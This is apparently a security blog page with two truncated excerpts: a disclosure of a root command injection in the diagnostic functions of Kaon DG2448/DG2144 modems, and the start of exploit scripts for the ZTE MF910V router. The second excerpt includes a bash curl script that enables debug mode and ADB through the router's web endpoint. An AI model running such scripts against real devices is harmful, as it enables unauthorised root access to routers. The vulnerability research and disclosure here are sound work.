Franks Electric Dreams

Command Injection Vulnerability in Kaon DG2448 & DG2144 Modems Command Injection Vulnerability in: Kaon DG2448 & DG2144 Modems Published on 7/30/24 3:17 PM Introduction In this post, I’ll be sharing my findings on a critical command injection vulnerability I discovered in the Kaon DG2448 and Kaon DG2144 modems. The vulnerability is a severe flaw that allows attackers to execute arbitrary commands with root privileges through the modems' web interface. I will explain the details of how the exploit works, the potential impact, and how users and organizations can protect themselves. The Vulnerability Overview Upon analyzing the modems’ web service, I found that several diagnostic functions are vulnerable to command injection. These functions include: Ping (under Diagnostics Tab) Traceroute (under Diagnostics Tab) NsLookup (under Diagn...

 Telstra ZteMF910/v Exploit Scripts To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required. Mode Switching and Enabling ADB To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example: language-bash #!/bin/bash # Mode Switching MODE_SWITCH_URL= "http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X" MODE_SWITCH_VALUE= "1" # Change X to 0 or 1 curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable= $MODE_SWITCH_VALUE " $MODE_SWITCH_URL # Enabling ADB ADB_ENABLE_URL= "http://192.168.0.1/goform/goform_set_cmd_pr...